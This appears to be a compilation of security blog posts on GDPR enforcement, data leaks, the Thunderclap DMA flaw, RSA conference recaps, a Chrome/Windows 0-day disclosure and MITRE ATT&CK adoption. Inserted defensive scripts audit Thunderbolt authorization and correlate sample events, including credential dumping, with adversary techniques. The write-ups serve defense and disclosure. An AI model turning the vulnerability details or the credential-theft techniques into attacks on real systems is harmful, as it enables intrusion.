With the responsibility now firmly on the business to protect the data of UK citizens, companies are expected to keep a much higher standard of security in order to protect all personal data of their clients.

How many complaints to the ICO?
Elizabeth Denham, the UK’s Information Commissioner, said that the year 2017-18 was ‘one of increasing activity and challenging actions, some unexpected, for the office’.

This is shown in an increase in data protection complaints by 15%, as well as an increase in self-reported breaches by 30%. Since this is the first year of GDPR, it is expected that self-reported breaches have increased as businesses work to insure themselves against much higher fines for putting off their announcement.

The ICO also reports 19 criminal prosecutions and 18 convictions last year and fines totalling £1.29 million for serious security failures under the Data Protection Act 1998. The office has assured that they don’t intend to make an example of firms reporting data breaches in the early period of GDPR but as time goes on, leniency is likely to fade as businesses settle into the higher standards.

What does it mean for SMEs?
With 36% of SMEs having no cybersecurity plan, the general consensus is that they make for unpopular targets. However, with the GDPR, the responsibility is on the business to protect their data so being vulnerable could result in business-destroying costs. Considering the cost to businesses could total the higher of 2% of annual turnover or €10 million, data protection is of paramount importance to small businesses.

How exposed are we in the UK?
At 31%, our vulnerability rating is higher than the Netherlands, Germany, Estonia (30%) and Finland (29%), but the UK is a more likely target for cybercriminals looking to exploit high tech and financial services industries, which are some of the most vulnerable across Great Britain.

Despite a higher level of vulnerability, the UK has one of the largest cyber security talent pools, showing there is time and manpower being dedicated to the protection of our data online.

https://www.cybersecurity-professionals.com/blog/2019/03/01/cybercrime-in-the-uk-infographic/

How to Make Sure Spring Break Doesn’t Wreck Your Digital Rep

Spring Break and reputation management

Spring Break 2019 is in full swing, which means high school and college kids have hit the road determined to make this rite of passage epic. Unfortunately, not everyone will return home with his or her online reputation intact.

Despite the headlines and warnings, kids are still uploading their lives 24/7 and not all of their choices will be wise. While impressive at the moment, showcasing one’s exceptional beer pong or body shot skills could become a future digital skeleton.

Define it

The decision to share reckless content online has damaged (even destroyed) scholarships, opportunities, reputations, and careers.

Each day more than one billion names are searched on Google, and 77% of job recruiters look potential employees up online during the hiring process, according to BrandYourself.com. Also, 45% of people have found content in an online search that made them decide not to do business with someone.

As elementary as it sounds, the first step to helping your child safeguard his or her online reputation this spring break is defining what is and is not appropriate online content.


Technology has created a chasm between generations so don’t assume your values align with your child’s in this area. Behavior once considered inappropriate has slowly become acceptable to kids who grew up in the online space. Also, peers often have far more influence than parents.

So take the time to define (and come to an agreement on) content you consider off limits such as profanity, racy photos, mean, disrespectful, or racist comments, irresponsible or prank videos, or pictures that include alcohol or drug use. (Yes, state the obvious!)

Untag It


Turn off tagging. Like it or not, people often judge us by the company we keep. Your child’s online behavior may be stellar, but tag-happy, reckless friends can sink that quickly. To make sure your child doesn’t get tagged in risky photos on Twitter, Instagram, or Facebook, encourage them to adjust privacy settings to prevent tagging or require user approval. Also, help your kids pay more attention to unflattering Snapchat photos and Snapchat story photos that other people post about them, which can be problematic if shared elsewhere.

Lock It

Amp privacy settings. By adjusting privacy settings to “friends only” on select social networks, digital mistakes can be minimized. However, we know that anything uploaded can be shared and screen captured before it’s deleted, so tightening privacy settings isn’t a guarantee.

Google It

To get a clear picture of your child’s digital footprint and what a school or future employer might find, Google your child’s name. Examine the social networks, links, and sites that have cataloged information about your child. One of the best ways to replace damaging digital information is by creating positive information that overshadows it. Encourage your child to set up a Facebook page that reflects their best self — their values, their goals, and their character. Make the page public so others can view it. They may also consider setting up a LinkedIn page that highlights specific achievements, goals, and online endorsements from teachers and past employers.

If for some reason there’s damaging content that can’t be removed by request, encourage your child to set up a personal website and blog weekly. This can be a professional or hobby blog, but the idea is to repopulate the search results with favorable content and push the tainted content further down on Google.

Balance It

In your guiding, don’t forget the wise words of Cyndi Lauper who reminds us all, “Girls just wanna have fun!” Strive for balance in giving kids the room to make memories with friends while at the same time equipping them to make wise choices online.

The post How to Make Sure Spring Break Doesn’t Wreck Your Digital Rep appeared first on McAfee Blogs.

809 Million Records Left Exposed: How Users Can Protect Their Data

It’s no secret that technological advancements and online threats are directly proportional to each other. So now more than ever, it’s imperative that users prioritize the security of their digital presence, especially in the face of advanced malware attacks and massive data leaks. Speaking of the latter — less than two months after the Collection #1 data breach exposed 773 million email addresses, it seems we have another massive data dump in our midst. Last week, researchers discovered a 150-gigabyte database containing 809 million records exposed by the email validation firm, Verifications.io.

You may be wondering how Verifications.io had so much data left to be exposed. Most people have heard of email marketing, but very few realize that these companies often vet user email addresses to ensure their validity. Enter Verifications.io. This company serves as a way email marketing firms can outsource the extensive work involved with validating mass amounts of emails and avoid the risk of having their infrastructure blacklisted by spam filters. Verifications.io was entrusted with a lot of data provided by email marketing firms looking to streamline their processes, creating an information-heavy database.

This unusual data trove contains tons of sensitive information like names, email addresses, phone numbers, physical addresses, gender, date of birth, personal mortgage amounts, interest rates, social media accounts, and characterizations of people’s credit scores. While the data doesn’t contain Social Security Numbers or credit card information, that amount of aggregated data makes it much easier for cybercriminals to run new social engineering scams or expand their target audience. According to security researcher Troy Hunt, owner of HaveIBeenPwned, 35% of the data exposed by Verifications.io is new to his database. With that said, it was the second largest data dump added in terms of email addresses to Hunt’s website, which allows users to check whether their data has been exposed or breached.

Upon discovery, the firm was made aware of the incident. And while proper security measures were taken, users can take various steps themselves to protect their information in the event of largescale data exposure. Check out the following tips:

  • Be vigilant when monitoring your personal and financial data. A good way to determine whether your data has been exposed or compromised is to closely monitor your online accounts. If you see anything fishy, take extra precautions by updating your privacy settings, changing your password, or using two-factor authentication.
  • Use strong, unique passwords. Make sure to use complex passwords for each of your individual accounts, and never reuse your credentials across different platforms. It’s also a good idea to update your passwords on a consistent basis to further protect your data.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post 809 Million Records Left Exposed: How Users Can Protect Their Data appeared first on McAfee Blogs.

RSA Conference 2019: A Recap

RSA is pretty amazing! I’ve been to a lot of security and tech conferences over the years, but somehow always missed the train to RSA. The show is absolutely massive, and involves an entire week of tradeoffs for an attendee – do you walk the expo hall for hours on end? Meet with customers? New prospects? Attend the sessions? Analysts? Write content? Promote on social media? Network with new vendors and partners? Or eat lunch? There is nowhere near enough time to do everything you want to do (I’ll cover a recommendation for this at the end), and RSA has so much to offer.

I had a fantastic week in San Francisco (minus the weather, I think we all could have done without that). I learned a lot while I was here and wish, like many, I had more time to do it. However, I’m flying home tomorrow, and I’m absolutely exhausted, so a weekend at home, with the peace and quiet, and catching up on some work emails is very welcoming!

Another interesting thing, from a vendor perspective, is that there are two sides to a conference like this. There is the work happening at the conference itself (keynotes, sessions, and vendor booths), and then there is everything happening adjacent to it (networking, customer meetings, and business partnerships). And every single person here, the 40K+ attendees, are all on their own missions; it’s inspiring to see the drive behind everyone’s eyes.

If you’re on LinkedIn, connect with me, and let me know how RSA was for you!

Themes

RSA had a lot of themes that were presented both purposefully, and by accident in the market shifts represented by the vendor booths. The first set of themes was set by the keynote address, specifically that “we are better together,” that AI and humans together is critical to the future, and that trust moving forward is going to make or break our future.

The importance of diversity and inclusion in the security industry also surfaced through many conversations. Walking the show floor, it’s amazing to see how far we have come in our efforts to include people of different backgrounds. But while we have made a lot of progress, there is still a lot of work to be done here.

The last major theme that played out, similar to “better together,” is that none of us are alone. While our market may be fiercely competitive at times, we ultimately are all moving towards the same goals: to protect ourselves, our customers, our data, our people, and our country. The honor and pride in the work that we do is incredible. There will be trying times, there will be breaches, there will be cyberattacks, and in those moments, we have to remember that none of us are alone in these efforts.

Takeaways

There is no shortage of security companies, and the evolution of technology is at a break-neck pace. So many new companies were on the RSA expo floor, with leading-edge technology, cool stories to tell, and a lot of fun designs. Standing out at the expo hall is no easy task.

We have to continue our efforts on the diversity and inclusion fronts, and every company must make a conscious effort to do so. Again, we’ve made a lot of progress, but we still have a long way to go. We need to make security sound as cool as it really is, and encourage the youngest generations to get involved.

The world is changing rapidly! Cyberattacks are becoming more frequent, and the rate at which they’re changing their patterns is accelerating. The private sector is going to have a hard time keeping up with state-sponsored attacks, and the industry could do with more collaborative, cross-business work.

There is a lot of noise in the marketplace. So many vendors are solving the same problems, but in slightly different ways. As a product marketer, this is rife with opportunity! Product marketers of the world: please understand your buyers’ needs and bring to the forefront exactly how your business solves those problems – and then go after that market. Make it crystal clear! Again, in the spirit of “better together,” connect with me on LinkedIn if you’re not sure how to go about that.

Veracode’s Presence

I have to spend a little bit of time talking about Veracode at RSA this year. We came full force! We brought an army of Veracoders to RSA this year, from all different departments and with a variety of backgrounds. We had a really large booth with a ton of traffic all week. We were thrilled to have Sophia, the world’s first humanoid robot, join us to answer attendees’ questions. We met with thousands of people, held hundreds of meetings, handed out a ton of customized t-shirts, conducted demos, and had some of our brightest minds present on a number of topics, like how to make security part of your competitive edge. Veracode launched its refreshed branding, with a new focus on YOU! You, our customers, are the ones that are changing this world – we’re just helping you secure it. We worked really hard all week, but we had a lot of fun doing it. And if you saw some Veracoders and want to be part of something amazing, come see what it’s all about.

Recommendations

Since this was my first year at RSA, there are a few things I would do differently – so let me share with you a few recommendations, both from a vendor perspective and an attendee’s perspective.

Vendors with booths, especially the smaller ones: make sure what you do and your differentiating value proposition are front and center. Bigger companies can get away with a little more ambiguity, because the booths are so big. Your buyers are walking by, and with over 300 booths to choose from, and no time to do it, you have to make sure that in the THREE seconds it takes to walk by, your potential buyers know you can solve a specific pain point they have.

Attendees – plan, plan, plan. Start with what you want to get out of RSA, and then make sure everything you do centers around that. You are not going to be able to do it all, so you’re better off focusing on one or two areas, and going all in on those. Make sure you have a schedule and that it’s really locked down, and leave time to walk the show floor – it’s fun!

Vendors and attendees: Please remember to take care of yourselves and each other. We are all just humans after all. Remember to eat, go for that run in the morning, take that bath in the evening, watch your favorite show, and get some much-needed rest. Don’t forsake your health. You will be on your feet all day, so make sure you’re healthy. Oh, and try to wear comfortable shoes! You’re going to be on your feet a lot.

Stay tuned for more from RSA … in 2020! In the meantime, learn more about Veracode.

Don’t Let Thunderclap Flaws Strike Your Device

If you own a Mac or PC, odds are you’ve used your laptop’s Thunderbolt port to connect another device to your machine. Thunderbolt ports are convenient for charging other devices using your laptop or desktop’s battery power. However, a new flaw called Thunderclap allows attackers to steal sensitive information such as passwords, encryption keys, financial information, or run detrimental code on the system if a malicious device is plugged into a machine’s port while it’s running.

So, how can attackers exploit this flaw? Thunderbolt accessories are granted direct-memory access (DMA), which is a method of transferring data from a computer’s random-access memory (RAM) to another part of the computer without it needing to pass through the central processing unit (CPU). DMA can save processing time and is a more efficient way to move data from the computer’s memory to other devices. However, attackers with physical access to the computer can take advantage of DMA by running arbitrary code on the device plugged into the Thunderbolt port. This allows criminals to steal sensitive data from the computer. Mind you, Thunderclap vulnerabilities also provide cybercriminals with direct and unlimited access to the machine’s memory, allowing for greater malicious activity.

Thunderclap-based attacks can be carried out with either specially built malicious peripheral devices or common devices such as projectors or chargers that have been altered to automatically attack the host they are connected to. What’s more, they can compromise a vulnerable computer in just a matter of seconds. Researchers who discovered this vulnerability informed manufacturers and fixes have been deployed, but it’s always good to take extra precautions. So, here are some ways users can defend themselves against these flaws:

  • Disable the Thunderbolt interface on your computer. To remove Thunderbolt accessibility on a Mac, go to the Network Preference panel, click “OK” on the New Interface Detected dialog, and select “Thunderbolt Bridge” from the sidebar. Click the [-] button to delete the option as a networking interface and choose “Apply.” PCs often allow users to disable Thunderbolt in BIOS or UEFI firmware settings, which connect a computer’s firmware to its operating system.
  • Don’t leave your computer unattended. Because this flaw requires a cybercriminal to have physical access to your device, make sure you keep a close eye on your laptop or PC to ensure no one can plug anything into your machine without permission.
  • Don’t borrow chargers or use publicly available charging stations. Public chargers may have been maliciously altered without your knowledge, so always use your own computer accessories.
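The post covers disabling Thunderbolt on macOS and in PC firmware. On Linux the kernel exposes the same control surface through sysfs: each Thunderbolt domain has a security level (with “user” or “secure” a newly plugged device gets no PCIe access until it is authorized), and each connected device reports whether it has been authorized. The script below is an added example, not part of the original post or of any vendor tool: a POSIX shell audit that reports the IOMMU state, the domain security level and the authorization state of every attached device, so an operator can confirm that an unrecognised peripheral is still blocked. It assumes the standard Linux `thunderbolt` bus layout under `/sys` (the `security`, `iommu_dma_protection`, `authorized`, `vendor_name` and `device_name` attributes and `/sys/kernel/iommu_groups`); the sysfs root is a parameter so it can also be run against the constructed sample tree built by `tb_make_sample_tree`, which contains made-up device names rather than data from a real machine.

```shell
#!/bin/sh
# Added example (not from the original post): audit Thunderbolt authorization
# on a Linux host via sysfs. Assumed layout (standard "thunderbolt" bus):
#   $ROOT/bus/thunderbolt/devices/domainN/security -> none|user|secure|dponly|usbonly|nopcie
#   $ROOT/bus/thunderbolt/devices/domainN/iommu_dma_protection -> 0|1 (newer kernels only)
#   $ROOT/bus/thunderbolt/devices/<id>/authorized  -> 0 blocked, 1 authorized, 2 key-authorized
#   $ROOT/bus/thunderbolt/devices/<id>/vendor_name, device_name
#   $ROOT/kernel/iommu_groups/*                    -> present only when an IOMMU is active
# Exit status: 0 = nothing flagged, 1 = DMA exposure flagged, 2 = no Thunderbolt bus.

tb_audit() {
    root="${1:-/sys}"
    tbdir="$root/bus/thunderbolt/devices"
    if [ ! -d "$tbdir" ]; then
        echo "no Thunderbolt bus under $root (interface absent or disabled)"
        return 2
    fi
    rc=0

    # Without DMA remapping, any device granted PCIe access can read arbitrary
    # memory, which is exactly the Thunderclap scenario.
    if [ -d "$root/kernel/iommu_groups" ] && [ -n "$(ls -A "$root/kernel/iommu_groups" 2>/dev/null)" ]; then
        echo "iommu: active (DMA remapping available)"
    else
        echo "iommu: NOT active (peripheral DMA is unrestricted)"
        rc=1
    fi

    # Security level 'none' authorizes every device as soon as it is plugged in.
    for dom in "$tbdir"/domain*; do
        [ -r "$dom/security" ] || continue
        sec=$(cat "$dom/security")
        line="$(basename "$dom"): security=$sec"
        if [ -r "$dom/iommu_dma_protection" ]; then
            line="$line iommu_dma_protection=$(cat "$dom/iommu_dma_protection")"
        fi
        echo "$line"
        if [ "$sec" = "none" ]; then
            echo "  WARNING: devices are authorized without user approval"
            rc=1
        fi
    done

    # Per-device authorization state; entries without 'authorized' (the domains) are skipped.
    for dev in "$tbdir"/*; do
        [ -r "$dev/authorized" ] || continue
        auth=$(cat "$dev/authorized")
        name="$(cat "$dev/vendor_name" 2>/dev/null) $(cat "$dev/device_name" 2>/dev/null)"
        case "$auth" in
            0) state="BLOCKED (no PCIe/DMA access)" ;;
            1) state="AUTHORIZED (PCIe/DMA enabled)" ;;
            2) state="AUTHORIZED with key" ;;
            *) state="UNKNOWN ($auth)" ;;
        esac
        echo "  $(basename "$dev"): $name -> $state"
    done
    return $rc
}

# Build a constructed sysfs-like tree for demonstration (sample data, not a
# real machine). $1 = root dir, $2 = security level, $3 = "yes" to simulate an IOMMU.
tb_make_sample_tree() {
    sroot="$1"; level="$2"; iommu="$3"
    d="$sroot/bus/thunderbolt/devices"
    mkdir -p "$d/domain0" "$d/0-1" "$d/0-3" "$sroot/kernel"
    echo "$level" > "$d/domain0/security"
    echo "1" > "$d/0-1/authorized"                                 # a dock the user approved earlier
    echo "Example Corp" > "$d/0-1/vendor_name"
    echo "Docking Station (constructed)" > "$d/0-1/device_name"
    echo "0" > "$d/0-3/authorized"                                 # a newly plugged, unapproved device
    echo "Unknown Vendor" > "$d/0-3/vendor_name"
    echo "Unrecognised peripheral (constructed)" > "$d/0-3/device_name"
    [ "$iommu" = "yes" ] && mkdir -p "$sroot/kernel/iommu_groups/0"
    return 0
}

# Usage: run `tb_audit` with no argument against the live /sys, or against the
# constructed tree as shown here.
sample=$(mktemp -d)
tb_make_sample_tree "$sample" user yes
tb_audit "$sample" || echo "audit flagged issues"
rm -rf "$sample"
```

A device that shows as BLOCKED can be authorized deliberately (for example with `boltctl` on distributions that ship it); the point of the audit is that on a "user" or "secure" domain nothing gets DMA access until someone with local control says so, which is the mitigation the Thunderclap researchers' findings argue for.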

And, as always, stay on top of the latest consumer and mobile security threats by following @McAfee_Home on Twitter, listening to our podcast Hackable?, and ‘Liking’ us on Facebook.

The post Don’t Let Thunderclap Flaws Strike Your Device appeared first on McAfee Blogs.

Live From RSA: Diversity and Inclusion

At one of the keynote addresses at RSA, the opening speaker asked that everyone who identifies as a woman in the audience stand up. It was amazing to see how many women there were at the conference, but we have a long way to go.

Veracode has an incredibly diverse employee base, which makes working here a great experience. We don’t have men and women, we have “Veracoders,” and we take that pretty seriously. We are a women-led organization, with Sam King as our CEO. I am on the product strategy team, and more than half of our department is women. We have an incredible mix of races, religions, backgrounds, ages, and political viewpoints – and everyone respects each other no matter who they are or where they came from. Veracode also has a diversity and inclusion team that seeks to ensure we stay honest about our direction as a company and continues to push through barriers as often as possible.

I attended a great diversity and inclusion panel at RSA this year, where a resonating theme was “Diversity is a fact, but inclusion is a choice.” This panel had CISO/CSO representation from Xerox, ADP, United Airlines, and JP Morgan Chase – all companies that strive to take diversity and inclusion seriously.

Diversity and inclusion starts well before the employee is working in a company. It’s important to build the talent pipeline from an early age with programs that ensure diverse individuals have opportunities to grow and learn in STEM fields. Diversity and inclusion has to be something that you don’t accidentally fall into; it has to be a deliberate and thoughtful initiative in the company. A really awesome takeaway is that we could work to change the narrative around the security industry. We always idealize doctors, lawyers, and athletes for kids on TV shows and in movies, but telling a child that you are a CISO is boring. So one of the panelists says she tells kids she’s a “Professional Hacker,” and their eyes grow wide! I think that’s a really interesting approach, and we could work as an industry to make this field sound as cool and important as it really is!

One of the hardest questions the panel tried to answer was around the impact that diversity and inclusion has on the success of a business. They said there isn’t a really great way to measure this in terms of a trackable number. One of the recommendations was to have regular surveys on how people feel in their job – how comfortable they are in their role, how included they feel, and if they feel supported and have a path up and forward. 

In summary, the main takeaways were:

  • Ensure that as an industry we are building the talent pipeline from a very early age, so that people from diverse backgrounds pursue careers in security.
  • Companies must have more than just policies on diversity; they need a purposeful mission driven by a team in the company.
  • Ensure there is a plan for each and every employee to grow and feel like a partner with the business.

Stay tuned for more from RSA ...

Weekly Update 129


Heaps of stuff going on this week with all sorts of different bits and pieces. I bought a massive new stash of HIBP stickers (10k oughta last... a few weeks?), I'll be giving them out at a heap of upcoming events, I was on the Darknet Diaries podcast (which is epic!) plus there's more insights into the ShareThis data breach and the ginormous verifications.io incident. Oh - and Udemy is still pirating my content, here's the tweet if you'd like to let them know how you feel about that:

Next week I'll be coming from the US, either Denver or New York depending on how time goes. I'm sure not much will happen between now and then...


References

  1. I was on the Darknet Diaries podcast about the RockYou data breach (add this one to your regular list, Jack does a fantastic job of it)
  2. The ShareThis breach had people in there who never expected to be in there (that's a link to last week's weekly update, check out the comments there for more info)
  3. There's now 763 million more records in HIBP (you didn't give your data to verifications.io and neither did I, but they left it all sitting there open to the world)
  4. Udemy has got a long history of pirating and selling other people's content (no, they're not like YouTube, not unless they want to drop the facade of being a platform with quality content)
  5. Twilio is sponsoring my blog again this week (check out their stuff on implementing 2FA, it can be dead easy)

Cloudbric Shows Crypto Wallet Security Prowess With Latest Partnership with Bitberry


Cloudbric is pleased to announce it has recently signed an MOU with Bitberry, an easy and safe crypto wallet run by RootOne.

As a subsidiary of Dunamu, the main company behind Korea’s largest cryptocurrency exchange Upbit, RootOne developed the Bitberry mobile app wallet to safeguard the crypto assets of users and to make it easy for users to send payments through phone numbers or email without any need to store private keys.

Currently, Bitberry has over 30 cryptocurrencies (more coming soon) available to store and send on its mobile app. Most recently, the global version has been released, with both Android and iOS versions available for download.

Working with reputable companies is critical for Cloudbric in growing its service. Through this partnership, Cloudbric will work with Bitberry in interchanging cyber threat data, specifically fraudulent wallet addresses for Cloudbric’s soon to launch Threat Database.

Cloudbric aims to use this cyber threat intelligence for the development of its security platform and crypto asset protection service. Additionally, we will work together to create a safer crypto wallet service and will make the CLB token available through Bitberry’s platform in the future, enabling the payment of services with CLB.

Cloudbric has already provided security to various crypto exchanges and wallet services. As we move forward, the team will continue working in the blockchain security field.


Make sure to follow us on our social media platforms (LinkedIn, Twitter, and Facebook) and our recently opened Telegram Announcement Channel for the latest updates!

The post Cloudbric Shows Crypto Wallet Security Prowess With Latest Partnership with Bitberry appeared first on Cloudbric.

Disclosing vulnerabilities to protect users across platforms



On Wednesday, February 27th, we reported two 0-day vulnerabilities — previously publicly-unknown vulnerabilities — one affecting Google Chrome and another in Microsoft Windows that were being exploited together.

To remediate the Chrome vulnerability (CVE-2019-5786), Google released an update for all Chrome platforms on March 1; this update was pushed through Chrome auto-update. We encourage users to verify that Chrome auto-update has already updated Chrome to 72.0.3626.121 or later.

The second vulnerability was in Microsoft Windows. It is a local privilege escalation in the Windows win32k.sys kernel driver that can be used as a security sandbox escape. The vulnerability is a NULL pointer dereference in win32k!MNGetpItemFromIndex when NtUserMNDragOver() system call is called under specific circumstances.

We strongly believe this vulnerability may only be exploitable on Windows 7 due to recent exploit mitigations added in newer versions of Windows. To date, we have only observed active exploitation against Windows 7 32-bit systems.

Pursuant to Google’s vulnerability disclosure policy, when we discovered the vulnerability we reported it to Microsoft. Today, also in compliance with our policy, we are publicly disclosing its existence, because it is a serious vulnerability in Windows that we know was being actively exploited in targeted attacks. The unpatched Windows vulnerability can still be used to elevate privileges or combined with another browser vulnerability to evade security sandboxes. Microsoft have told us they are working on a fix.

As mitigation advice for this vulnerability, users should consider upgrading to Windows 10 if they are still running an older version of Windows, and apply Windows patches from Microsoft when they become available. We will update this post when they are available.

Live From RSA: In a World Changed by Software, Make Security Your Competitive Advantage

At RSA, our own CEO Sam King and CTO Chris Wysopal presented to a roomful of intrigued attendees on how software has completely changed the way businesses tackle problems, how companies work every day to change our world, and how doing so in a secure manner provides these companies with a competitive edge in the marketplace.

The key takeaway, if you read nothing else, is this: companies leverage software to rapidly solve life-changing problems in innovative ways, but the speed of doing so means nothing if the software you build is insecure. Companies build their own competitive advantage by staying agile. And if companies have to drop everything in order to deal with a security breach, they lose all of the competitive advantage they worked so hard to build. So companies must work to make security part of the competitive advantage that helps them change the world.

When we think about software, it’s easy to default to thinking about browsers, word processing software, and accounting programs. We forget that software also powers many life-critical things. The agricultural industry leverages software to ensure that the right amount of irrigation is used based on the saturation of the soil. Healthcare companies leverage software to find new cures and supply the right amount of medicine. Weather companies leverage software to better predict severe storms in order to warn people in the damaging path. 

You are leveraging software to change the world for the better, every single day. We want to make sure that the work you’re doing doesn’t become undone, because we need you, our country needs you, and our entire human civilization needs you.

Sam and Chris talked about how the entire world of software itself has changed, with a greater focus on automation. Chris painted a picture of the three waves of automation that we have undergone. The first being the automation of back-end systems, like financial programs. Then we experienced front-end automation, like e-commerce stores. Finally, we are now in the automation phase of software, augmenting everything else from medicine to the space program.

So to stay up to speed with the rate of change, to keep your competitive advantage, and to continue changing the world – you have to implement security practices in your software development processes. And the security needs to be automated, integrated into developer tools, and help facilitate actual fixing of the code (after all, a list of security issues is nothing more than a list if they never get fixed, and what good is that?)

Every day you’re changing the world; we’ll help you secure it in the process.

Stay tuned for more from RSA …

Deriving value from the MITRE ATT&CK Threat Model

The MITRE ATT&CK knowledge base continues to gain traction as the de facto source for supporting business threat assessment and for developing proactive cybersecurity and cyber-resilience strategies. ATT&CK provides a defined understanding of adversaries and their associated tactics, techniques and procedures (TTPs). This comprehensive knowledge base of adversary tactics and techniques has been built up from real-world observations and is freely available to use.
There are many ways in which organisations can benefit from ATT&CK, often dependent on an organisation's security capabilities and general security maturity. Steve Rivers, Technical Director International at ThreatQuotient, has written guidance on the MITRE ATT&CK stages of maturity, so that any organisation can derive value from it.

MITRE ATT&CK Framework: Keep your friends close, but your enemies even closer

Steve Rivers, Technical Director International at ThreatQuotient

So, how can you get started and use the framework? Nearly every organisation is interested in using MITRE ATT&CK, but they have different views on how it should be adopted based on the capabilities of their security operations. We need to make sure that the MITRE ATT&CK framework doesn’t become another source of threat data that is not fully utilised, or a passing fad, or a tool that only the most sophisticated security operations teams can apply effectively. To avoid this fate, we must look at ways to map the framework to stages of maturity so that every organisation can derive value. Here are a few examples of how to use the framework with appropriate use cases as maturity levels evolve.

Stage 1: Reference and Data Enrichment

The MITRE ATT&CK framework contains a tremendous amount of data that could potentially be valuable to any organisation. The MITRE ATT&CK Navigator provides a matrix view of all the techniques so that security analysts can see what techniques an adversary might apply to infiltrate their organisation. To more easily consume this data, a good place to start is with tools that make that data easy to access and share across teams. This may be through an enrichment tool or a platform with a centralised threat library that allows a user to aggregate the data and easily search for adversary profiles to get answers to questions like: Who is this adversary? What techniques and tactics are they using? What mitigations can I apply? Security analysts can use the data from the framework as a detailed source of reference to manually enrich their analysis of events and alerts, inform their investigations and determine the best actions to take depending on relevance and sightings within their environment.

Stage 2: Indicator or Event-driven Response

Building on the ability to reference and understand MITRE ATT&CK data, in Stage 2 security teams incorporate capabilities in the platform within their operational workflows that allow them to apply a degree of action to the data more effectively. For example, with the data ingested in a centralised threat library, they can build relationships between that data automatically without having to form those relationships manually. By automatically correlating events and associated indicators from inside the environment (from sources including the security information and event management (SIEM) system, log management repository, case management systems and security infrastructure) with indicators from the MITRE ATT&CK framework, they gain the context to immediately understand the who, what, where, when, why and how of an attack. They can then automatically prioritise based on relevance to their organisation and determine high-risk indicators of compromise (IOCs) to investigate within their environment. With the ability to use ATT&CK data in a more simple and automated manner, security teams can investigate and respond to incidents and push threat intelligence to sensors for detection and hunt for threats more effectively.

Stage 3: Proactive Tactic or Technique-driven Threat Hunting
At this stage, threat hunting teams can pivot from searching for indicators to taking advantage of the full breadth of ATT&CK data. Instead of narrowly focusing on more targeted pieces of data that appear to be suspicious, threat hunting teams can use the platform to start from a higher vantage point with information on adversaries and associated TTPs. They can take a proactive approach, beginning with the organisation’s risk profile, mapping those risks to specific adversaries and their tactics, drilling down to techniques those adversaries are using and then investigating if related data have been identified in the environment. For example, they may be concerned with APT28 and can quickly answer questions including: What techniques do they apply? Have I seen potential IOCs or possible related system events in my organisation? Are my endpoint technologies detecting those techniques?
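The Stage 2 and Stage 3 workflow reduced to code, as an added example that is not from the article or from ThreatQuotient: constructed events already tagged with ATT&CK technique IDs are correlated against constructed adversary profiles (the APT28 mapping is hypothetical, not the real ATT&CK group entry), ranked by overlap, and turned into a hunting backlog, a host triage order and a minimal Navigator layer whose field subset is an assumption to check against the Navigator layer format.

```python
"""Stage 2 / Stage 3 in miniature: correlate internal events with ATT&CK
technique IDs, rank adversary profiles by overlap and list hunting gaps.

Added example. The threat-library subset, the adversary-to-technique
mappings and the events are constructed sample data; real work would load
groups and techniques from the ATT&CK STIX bundle.
"""
from collections import defaultdict
from dataclasses import dataclass

# Constructed threat-library subset (the IDs and names are current ATT&CK
# enterprise techniques, but this is a hand-picked sample, not the matrix).
TECHNIQUES = {
    "T1566": "Phishing",
    "T1059": "Command and Scripting Interpreter",
    "T1003": "OS Credential Dumping",
    "T1071": "Application Layer Protocol",
    "T1078": "Valid Accounts",
    "T1021": "Remote Services",
}

# Constructed adversary profiles: hypothetical mappings used only to show the
# workflow, NOT the technique lists on the real ATT&CK group pages.
ADVERSARY_TECHNIQUES = {
    "APT28": {"T1566", "T1059", "T1003", "T1071"},
    "SampleGroupB": {"T1078", "T1021", "T1071"},
}


@dataclass(frozen=True)
class Event:
    """One internal event that a detection rule already tagged with a technique."""
    source: str      # SIEM, EDR, proxy, case management, ...
    host: str
    technique: str   # ATT&CK technique ID
    summary: str


# Constructed sample events, as a SIEM or EDR might emit them.
EVENTS = [
    Event("mail-gateway", "ws-01", "T1566", "attachment from unknown sender opened"),
    Event("EDR", "ws-01", "T1059", "powershell.exe spawned by outlook.exe"),
    Event("EDR", "dc-01", "T1003", "lsass.exe memory read by an unsigned process"),
    Event("proxy", "ws-02", "T1071", "periodic HTTPS beacons to a rare domain"),
]


def correlate(events):
    """Group events by technique ID; IDs missing from the library are dropped."""
    by_technique = defaultdict(list)
    for ev in events:
        if ev.technique in TECHNIQUES:
            by_technique[ev.technique].append(ev)
    return dict(by_technique)


def rank_adversaries(events, profiles=ADVERSARY_TECHNIQUES):
    """'Who is this adversary?': profiles ordered by overlap with what was seen.

    Returns (name, overlap count, sorted matched technique IDs) tuples."""
    seen = set(correlate(events))
    ranked = [(name, len(seen & techs), sorted(seen & techs))
              for name, techs in profiles.items()]
    # most overlap first, ties broken by name so the order is deterministic
    ranked.sort(key=lambda r: (-r[1], r[0]))
    return ranked


def coverage_gaps(adversary, events, profiles=ADVERSARY_TECHNIQUES):
    """Profile techniques with no sighting: the proactive hunting backlog."""
    return sorted(profiles[adversary] - set(correlate(events)))


def hosts_to_investigate(adversary, events, profiles=ADVERSARY_TECHNIQUES):
    """Hosts ranked by how many distinct profile techniques were seen on them."""
    per_host = defaultdict(set)
    for ev in events:
        if ev.technique in profiles[adversary]:
            per_host[ev.host].add(ev.technique)
    return sorted(((host, len(techs)) for host, techs in per_host.items()),
                  key=lambda r: (-r[1], r[0]))


def navigator_layer(events, name="sightings"):
    """Sighting counts as a minimal ATT&CK Navigator layer. Assumption: the
    field subset used here (name, domain, description, techniques with
    techniqueID/score/comment); check it against the Navigator layer spec."""
    return {
        "name": name,
        "domain": "enterprise-attack",
        "description": "constructed sightings, one score point per event",
        "techniques": [
            {"techniqueID": tid, "score": len(evs),
             "comment": "; ".join(f"{e.host}: {e.summary}" for e in evs)}
            for tid, evs in sorted(correlate(events).items())
        ],
    }


if __name__ == "__main__":
    for name, count, matched in rank_adversaries(EVENTS):
        print(f"{name}: {count} technique(s) seen {matched}")
    print("hunting gaps for APT28:", coverage_gaps("APT28", EVENTS))
    print("hosts to investigate first:", hosts_to_investigate("APT28", EVENTS))
```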

The success of MITRE ATT&CK will depend on how easy it is to apply effectively. With an understanding of maturity levels and use cases, and the ability for technologies to support security operations teams at whatever stage they are in, organisations will be able to use the framework to their advantage. As their desire and capabilities to use the data evolve and grow, they’ll be able to dig deeper into the MITRE ATT&CK framework and gain even greater value.

Bypassing CVE-2018-15442: Another Case of DLL Hijacking

